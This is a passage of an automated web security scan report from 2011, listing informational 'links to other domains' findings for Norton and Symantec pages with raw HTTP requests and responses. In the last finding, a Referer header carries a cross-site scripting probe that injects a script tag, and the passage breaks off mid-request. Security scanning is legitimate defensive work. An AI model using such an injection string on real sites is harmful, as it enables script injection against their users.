href="http://www.symantec.com/enterprise/support/index.jsp" title="Business Support"> Business Support</a>...[SNIP]... <li><a href="http://www.symantec.com/enterprise/contact_sales.jsp" title="Business Sales"> Business Sales</a>...[SNIP]... <li><a href="http://www.symantec.com/feedback/contactus.jsp" title="Corporate Information"> Corporate Information</a>...[SNIP]... <span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact"> Contact</a>...[SNIP]... <span><a href="http://www.symantec.com/rss/index.jsp" title="RSS"> RSS</a>...[SNIP]...
14.52. http://us.norton.com/support/dtree.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://us.norton.com
Path:
/support/dtree.jsp
Issue detail
The page was loaded from a URL containing a query string:http://us.norton.com/support/dtree.jsp?pvid= The response contains the following links to other domains:http://www.symantec.com/about/index.jsp http://www.symantec.com/about/profile/policies/eulas/index.jsp http://www.symantec.com/about/profile/policies/legal.jsp http://www.symantec.com/about/profile/policies/repository.jsp http://www.symantec.com/about/profile/privacypolicy/index.jsp http://www.symantec.com/business/index.jsp http://www.symantec.com/business/solutions/smallbusiness/index.jsp http://www.symantec.com/enterprise/contact_sales.jsp http://www.symantec.com/enterprise/support/index.jsp http://www.symantec.com/feedback/contactus.jsp http://www.symantec.com/partners/index.jsp http://www.symantec.com/rss/index.jsp http://www.symantec.com/sitemap/index.jsp https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN
Request
GET /support/dtree.jsp?pvid= HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 301 Moved Permanently Server: Sun-Java-System-Web-Server/7.0 Location: https://www-secure.symantec.com/norton-support/index.jsp?&lg=english&ct=united+states&product=home&version=1&pvid=f-home&entsrc=redirect_pubweb Content-Type: text/html;charset=utf-8 Content-Length: 38842 Vary: Accept-Encoding Cache-Control: public, max-age=2709 Date: Fri, 09 Sep 2011 21:47:15 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Norton Product Support ... Technical Issues | Order Status | Rebates | Norton Support</title> <meta http-equiv="Con...[SNIP]... <div id="globalNavMainInner2"> <a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'> Small Business</a>...[SNIP]... <div id="globalNavMainInner3"> <a href='http://www.symantec.com/business/index.jsp'> Enterprise</a>...[SNIP]... <div id="globalNavMainInner4"> <a href='http://www.symantec.com/partners/index.jsp'> Partners</a>...[SNIP]... <div id="globalNavMainInner6"> <a href='http://www.symantec.com/about/index.jsp'> About Symantec</a>...[SNIP]... <li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN' title='Norton Order Status'> Order Status</a>...[SNIP]... <div class ="quicklink_item"> <a href="https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN" target="_blank" onclick="javascript:trackCustomLink(this, 'order_status')"> <img src="/content/en/us/home_homeoffice/images/support/ver1/dtree/button_orderStatus.png" border="0" height="43" width="40" />...[SNIP]... <span><a href="http://www.symantec.com/about/index.jsp" title="About"> About</a>...[SNIP]... <span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map"> Site Map</a>...[SNIP]... <li><a href="http://www.symantec.com/about/profile/policies/legal.jsp" title="Legal Notices"> Legal Notices</a>...[SNIP]... <li><a href="http://www.symantec.com/about/profile/policies/eulas/index.jsp" title="License Agreements"> License Agreements</a>...[SNIP]... <li><a href="http://www.symantec.com/about/profile/policies/repository.jsp" title="Repository"> Repository</a>...[SNIP]... <span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal"> Legal</a>...[SNIP]... <span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy"> Privacy</a>...[SNIP]... <li><a href="http://www.symantec.com/enterprise/support/index.jsp" title="Business Support"> Business Support</a>...[SNIP]... <li><a href="http://www.symantec.com/enterprise/contact_sales.jsp" title="Business Sales"> Business Sales</a>...[SNIP]... <li><a href="http://www.symantec.com/feedback/contactus.jsp" title="Corporate Information"> Corporate Information</a>...[SNIP]... <span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact"> Contact</a>...[SNIP]... <span><a href="http://www.symantec.com/rss/index.jsp" title="RSS"> RSS</a>...[SNIP]...
14.53. http://us.norton.com/theme.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://us.norton.com
Path:
/theme.jsp
Issue detail
The page was loaded from a URL containing a query string:http://us.norton.com/theme.jsp?themeid=nis_nav_2012&inid=us_hho_homepage_hero1_nisnav2012 The response contains the following links to other domains:http://www.symantec.com/ http://www.symantec.com/about/index.jsp http://www.symantec.com/about/profile/policies/legal.jsp http://www.symantec.com/about/profile/privacypolicy/index.jsp http://www.symantec.com/business/index.jsp http://www.symantec.com/business/solutions/smallbusiness/index.jsp http://www.symantec.com/feedback/contactus.jsp http://www.symantec.com/globalsupport http://www.symantec.com/partners/index.jsp http://www.symantec.com/rss/index.jsp http://www.symantec.com/sitemap/index.jsp https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN
Request
GET /theme.jsp?themeid=nis_nav_2012&inid=us_hho_homepage_hero1_nisnav2012 HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=1331 Date: Fri, 09 Sep 2011 21:47:25 GMT Connection: close Connection: Transfer-Encoding Content-Length: 39140 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Introducing Norton Internet Security 2012 and Norton Antivirus 2012</title> <meta http-equiv="Content-Type" content...[SNIP]... <div id="globalNavMainInner2"> <a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'> Small Business</a>...[SNIP]... <div id="globalNavMainInner3"> <a href='http://www.symantec.com/business/index.jsp'> Enterprise</a>...[SNIP]... <div id="globalNavMainInner4"> <a href='http://www.symantec.com/partners/index.jsp'> Partners</a>...[SNIP]... <div id="globalNavMainInner6"> <a href='http://www.symantec.com/about/index.jsp'> About Symantec</a>...[SNIP]... <li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN' title='Norton Order Status'> Order Status</a>...[SNIP]... vice includes protection updates and new product features as available during the service period, subject to acceptance of the Symantec Agreement included with this product and available for review at <a href="http://www.symantec.com"> www.symantec.com</a>...[SNIP]... c provides free 24x7 email, chat and phone support for a period of one year from initial product installation. NortonLive™ Services sold separately. For full details and to access support, go to <a href="http://www.symantec.com/globalsupport"> www.symantec.com/globalsupport</a>...[SNIP]... <span><a href="http://www.symantec.com/about/index.jsp" title="About"> About</a>...[SNIP]... <span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map"> Site Map</a>...[SNIP]... <span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal"> Legal</a>...[SNIP]... <span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy"> Privacy</a>...[SNIP]... <span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact"> Contact</a>...[SNIP]... <span><a href="http://www.symantec.com/rss/index.jsp" title="RSS"> RSS</a>...[SNIP]...
14.54. http://us.norton.com/theme.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://us.norton.com
Path:
/theme.jsp
Issue detail
The page was loaded from a URL containing a query string:http://us.norton.com/theme.jsp?themeid=protect_yourself The response contains the following links to other domains:http://finedesign.vo.llnwd.net/o42/CCIGadget/cci.gadget http://www.nortoncybercrimeindex.mobi/ http://www.nortonfreetools.com/freePCCheckup/ http://www.symantec.com/about/index.jsp http://www.symantec.com/about/profile/policies/legal.jsp http://www.symantec.com/about/profile/privacypolicy/index.jsp http://www.symantec.com/business/index.jsp http://www.symantec.com/business/solutions/smallbusiness/index.jsp http://www.symantec.com/feedback/contactus.jsp http://www.symantec.com/partners/index.jsp http://www.symantec.com/rss/index.jsp http://www.symantec.com/sitemap/index.jsp https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN
Request
GET /theme.jsp?themeid=protect_yourself HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=3461 Date: Fri, 09 Sep 2011 21:47:25 GMT Connection: close Connection: Transfer-Encoding Content-Length: 33753 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Norton Cybercrime Index - Free Download</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/...[SNIP]... <div id="globalNavMainInner2"> <a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'> Small Business</a>...[SNIP]... <div id="globalNavMainInner3"> <a href='http://www.symantec.com/business/index.jsp'> Enterprise</a>...[SNIP]... <div id="globalNavMainInner4"> <a href='http://www.symantec.com/partners/index.jsp'> Partners</a>...[SNIP]... <div id="globalNavMainInner6"> <a href='http://www.symantec.com/about/index.jsp'> About Symantec</a>...[SNIP]... <li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN' title='Norton Order Status'> Order Status</a>...[SNIP]... <div class="mainBdyWrapBdy" style="width:308px; height: 390px;"> <a target="_blank" href="http://finedesign.vo.llnwd.net/o42/CCIGadget/cci.gadget"> <img src="/content/en/us/home_homeoffice/images/theme/cci/CCI_-NortonPageDwnLoad-GadgetAgreeBtn.jpg">...[SNIP]... <br/> <a target="_blank" href="http://www.nortoncybercrimeindex.mobi"> http://www.nortoncybercrimeindex.mobi</a>...[SNIP]... <div class="mainBdyWrapBdy" style="width:306px; height:390px;"> <a href="http://www.nortonfreetools.com/freePCCheckup/"> <img src="/content/en/us/home_homeoffice/images/theme/cci/Security-Scan-Button-blk-on-gld-303x52.jpg">...[SNIP]... <span><a href="http://www.symantec.com/about/index.jsp" title="About"> About</a>...[SNIP]... <span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map"> Site Map</a>...[SNIP]... <span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal"> Legal</a>...[SNIP]... <span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy"> Privacy</a>...[SNIP]... <span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact"> Contact</a>...[SNIP]... <span><a href="http://www.symantec.com/rss/index.jsp" title="RSS"> RSS</a>...[SNIP]...
14.55. http://us.norton.com/theme4.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://us.norton.com
Path:
/theme4.jsp
Issue detail
The page was loaded from a URL containing a query string:http://us.norton.com/theme4.jsp?themeid=free_tools_trials2 The response contains the following links to other domains:http://finedesign.vo.llnwd.net/o42/CCIGadget/cci.gadget http://security.symantec.com/nbrt/npe.asp?lcid=1033 http://www.facebook.com/apps/application.php?id=310877173418 http://www.symantec.com/about/index.jsp http://www.symantec.com/about/profile/policies/legal.jsp http://www.symantec.com/about/profile/privacypolicy/index.jsp http://www.symantec.com/business/index.jsp http://www.symantec.com/business/solutions/smallbusiness/index.jsp http://www.symantec.com/feedback/contactus.jsp http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif http://www.symantec.com/norton http://www.symantec.com/norton/community/index.jsp http://www.symantec.com/norton/support/index.jsp http://www.symantec.com/partners/index.jsp http://www.symantec.com/rss/index.jsp http://www.symantec.com/sitemap/index.jsp https://security.symantec.com/sscv6/DownloadInstructions.asp https://security.symantec.com/sscv6/WelcomePage.asp https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN
Request
GET /theme4.jsp?themeid=free_tools_trials2 HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Cache-Control: public, max-age=1124 Date: Fri, 09 Sep 2011 21:47:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 40638 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Download trials of Nortons Virus Protection and Spyware Remover Tools</title> <meta http-equiv="Content-Type" conte...[SNIP]... <div id="globalNavMainInner2"> <a href='http://www.symantec.com/business/solutions/smallbusiness/index.jsp'> Small Business</a>...[SNIP]... <div id="globalNavMainInner3"> <a href='http://www.symantec.com/business/index.jsp'> Enterprise</a>...[SNIP]... <div id="globalNavMainInner4"> <a href='http://www.symantec.com/partners/index.jsp'> Partners</a>...[SNIP]... <div id="globalNavMainInner6"> <a href='http://www.symantec.com/about/index.jsp'> About Symantec</a>...[SNIP]... <li><a href='https://www.mynortonaccount.com/amsweb/redirect.do?tok=&fpage=orderHistory&product_lang=EN' title='Norton Order Status'> Order Status</a>...[SNIP]... <br/><a href="http://finedesign.vo.llnwd.net/o42/CCIGadget/cci.gadget" target="_blank"> Try It</a>...[SNIP]... <h3><a href="https://security.symantec.com/sscv6/WelcomePage.asp"> Norton Security Scan</a>...[SNIP]... <div class="cbType22"><a href="https://security.symantec.com/sscv6/DownloadInstructions.asp" target="_blank"> Try It</a>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <br/> <a href="http://security.symantec.com/nbrt/npe.asp?lcid=1033"> Try It</a>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <br /><a href="http://www.facebook.com/apps/application.php?id=310877173418" target="_blank"> Try it</a>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <div class="tbl_rndcrn_divider"><img src="http://www.symantec.com/img/security_response/itm/osf/osf_divider_line.gif"> </div>...[SNIP]... <li><a href="http://www.symantec.com/norton"> Norton Homepage</a>...[SNIP]... <li><a href="http://www.symantec.com/norton/community/index.jsp"> Norton Forums</a>...[SNIP]... <li><a href="http://www.symantec.com/norton/support/index.jsp"> Norton Support</a>...[SNIP]... <span><a href="http://www.symantec.com/about/index.jsp" title="About"> About</a>...[SNIP]... <span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map"> Site Map</a>...[SNIP]... <span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal"> Legal</a>...[SNIP]... <span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy"> Privacy</a>...[SNIP]... <span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact"> Contact</a>...[SNIP]... <span><a href="http://www.symantec.com/rss/index.jsp" title="RSS"> RSS</a>...[SNIP]...
14.56. http://www.symantec.com/business/products/categories.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.symantec.com
Path:
/business/products/categories.jsp
Issue detail
The page was loaded from a URL containing a query string:http://www.symantec.com/business/products/categories.jsp?pcid=pcat_infrastruct_op The response contains the following links to other domains:http://free.pctools.com/free-antivirus/ http://us.norton.com/ http://us.norton.com/antivirus/ http://us.norton.com/ghost/ http://us.norton.com/internet-security/ http://us.norton.com/nortonlive/free-pc-checkup.jsp http://us.norton.com/nortonlive/spyware-virus-removal.jsp http://us.norton.com/security_response/malware.jsp http://us.norton.com/security_response/phishing.jsp http://us.norton.com/security_response/spyware.jsp http://www.backup.com/ http://www.pctools.com/file-recover/ http://www.pctools.com/password-manager/ http://www.pctools.com/performance-toolkit/ http://www.pctools.com/privacy-guardian/ http://www.pctools.com/registry-mechanic/ http://www.pctools.com/simple-backup/ http://www.pctools.com/spyware-doctor-antivirus/ http://www.pctools.com/spyware-doctor/ http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html http://www.verisign.com/authentication/two-factor-authentication/index.html http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html http://www.verisign.com/code-signing/index.html http://www.verisign.com/ssl/index.html http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html http://www.verisign.com/ssl/ssl-information-center/increase-traffic-conversion/index.html?tid=sym_bus_prod_lp http://www.verisign.com/ssl/ssl-information-center/index.html http://www.verisign.com/trust-seal/index.html http://www.verisign.com/trust-seal/resources/malware-faq/index.html
Request
GET /business/products/categories.jsp?pcid=pcat_infrastruct_op HTTP/1.1 Host: www.symantec.com Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/products/purchasing.jsp?pcid=pcat_info_risk_comp&pvid=fds_1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; bizProdScrollVertical=0; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/11; s_sq=%5B%5BB%5D%5D; s_pers=%20s_nr%3D1315622485105-New%7C1336358485105%3B%20event69%3Devent69%7C1336358485107%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520purchasing%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fbusiness%2525252Fproducts%2525252Fcategories.jsp%2525253Fpcid%2525253Dpcat_infrastruct_op%252526ot%25253DA%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Content-Length: 77466 Cache-Control: public, max-age=3563 Date: Fri, 09 Sep 2011 21:41:00 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Security, Backup & Archiving, Server Management, and Storage Software | Symantec Enterprise Products</title> <m...[SNIP]... <div class="promoProdOneCol4Lft"> <a href="http://www.verisign.com/ssl/ssl-information-center/increase-traffic-conversion/index.html?tid=sym_bus_prod_lp"> <img src="/content/en/us/enterprise/images/promo/b-verisign-promo.jpg" alt="Trust the Leader, VeriSign SSL Certificates, Buy Now" title="Trust the Leader, VeriSign SSL Certificates, Buy Now" class=" ...[SNIP]... <li><a href="http://us.norton.com/antivirus/" title="AntiVirus"> AntiVirus</a>...[SNIP]... <li><a href="http://us.norton.com/ghost/" title="Backup Software"> Backup Software</a>...[SNIP]... <li><a href="http://us.norton.com/internet-security/" title="Internet Security"> Internet Security</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/malware.jsp" title="Malware"> Malware</a>...[SNIP]... <li><a href="http://www.backup.com/" title="Online Backup"> Online Backup</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/phishing.jsp" title="Phishing"> Phishing</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/spyware.jsp" title="Spyware"> Spyware</a>...[SNIP]... <li><a href="http://us.norton.com/" title="Virus Protection"> Virus Protection</a>...[SNIP]... <li><a href="http://us.norton.com/nortonlive/spyware-virus-removal.jsp" title="Virus Removal"> Virus Removal</a>...[SNIP]... <li><a href="http://us.norton.com/nortonlive/free-pc-checkup.jsp" title="Virus Scan"> Virus Scan</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/ssl-information-center/index.html" title="SSL"> SSL</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/index.html" title="SSL Certificates"> SSL Certificates</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html" title="Extended Validation"> Extended Validation</a>...[SNIP]... <li><a href="http://www.verisign.com/trust-seal/index.html" title="VeriSign Trust Seal"> VeriSign Trust Seal</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/two-factor-authentication/index.html" title="Two-Factor Authentication"> Two-Factor Authentication</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html" title="Identity Protection"> Identity Protection</a>...[SNIP]... <li><a href="http://www.verisign.com/trust-seal/resources/malware-faq/index.html" title="Malware Scan"> Malware Scan</a>...[SNIP]... <li><a href="http://www.verisign.com/code-signing/index.html" title="Code Signing"> Code Signing</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html" title="Public Key Infrastructure"> Public Key Infrastructure</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html" title="PKI"> PKI</a>...[SNIP]... <li><a href="http://www.pctools.com/spyware-doctor-antivirus/" title="Spyware Doctor with Antivirus"> Spyware Doctor with Antivirus</a>...[SNIP]... <li><a href="http://www.pctools.com/performance-toolkit/" title="Performance Toolkit"> Performance Toolkit</a>...[SNIP]... <li><a href="http://www.pctools.com/simple-backup/" title="Simple Backup"> Simple Backup</a>...[SNIP]... <li><a href="http://www.pctools.com/file-recover/" title="File Recovery"> File Recovery</a>...[SNIP]... <li><a href="http://www.pctools.com/spyware-doctor/" title="Spyware Doctor"> Spyware Doctor</a>...[SNIP]... <li><a href="http://www.pctools.com/privacy-guardian/" title="Privacy Guardian"> Privacy Guardian</a>...[SNIP]... <li><a href="http://free.pctools.com/free-antivirus/" title="Free Antivirus"> Free Antivirus</a>...[SNIP]... <li><a href="http://www.pctools.com/password-manager/" title="Password Manager"> Password Manager</a>...[SNIP]... <li><a href="http://www.pctools.com/registry-mechanic/" title="Registry Mechanic"> Registry Mechanic</a>...[SNIP]...
14.57. http://www.symantec.com/business/products/purchasing.jsp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.symantec.com
Path:
/business/products/purchasing.jsp
Issue detail
The page was loaded from a URL containing a query string:http://www.symantec.com/business/products/purchasing.jsp?pcid=pcat_info_risk_comp&pvid=fds_1 The response contains the following links to other domains:http://free.pctools.com/free-antivirus/ http://us.norton.com/ http://us.norton.com/antivirus/ http://us.norton.com/ghost/ http://us.norton.com/internet-security/ http://us.norton.com/nortonlive/free-pc-checkup.jsp http://us.norton.com/nortonlive/spyware-virus-removal.jsp http://us.norton.com/security_response/malware.jsp http://us.norton.com/security_response/phishing.jsp http://us.norton.com/security_response/spyware.jsp http://www.backup.com/ http://www.pctools.com/file-recover/ http://www.pctools.com/password-manager/ http://www.pctools.com/performance-toolkit/ http://www.pctools.com/privacy-guardian/ http://www.pctools.com/registry-mechanic/ http://www.pctools.com/simple-backup/ http://www.pctools.com/spyware-doctor-antivirus/ http://www.pctools.com/spyware-doctor/ http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html http://www.verisign.com/authentication/two-factor-authentication/index.html http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html http://www.verisign.com/code-signing/index.html http://www.verisign.com/ssl/index.html http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html http://www.verisign.com/ssl/ssl-information-center/index.html http://www.verisign.com/trust-seal/index.html http://www.verisign.com/trust-seal/resources/malware-faq/index.html
Request
GET /business/products/purchasing.jsp?pcid=pcat_info_risk_comp&pvid=fds_1 HTTP/1.1 Host: www.symantec.com Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315621927_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/9; bizProdScrollVertical=0; s_pers=%20s_nr%3D1315622085200-New%7C1336358085200%3B%20event69%3Devent69%7C1336358085202%3B; 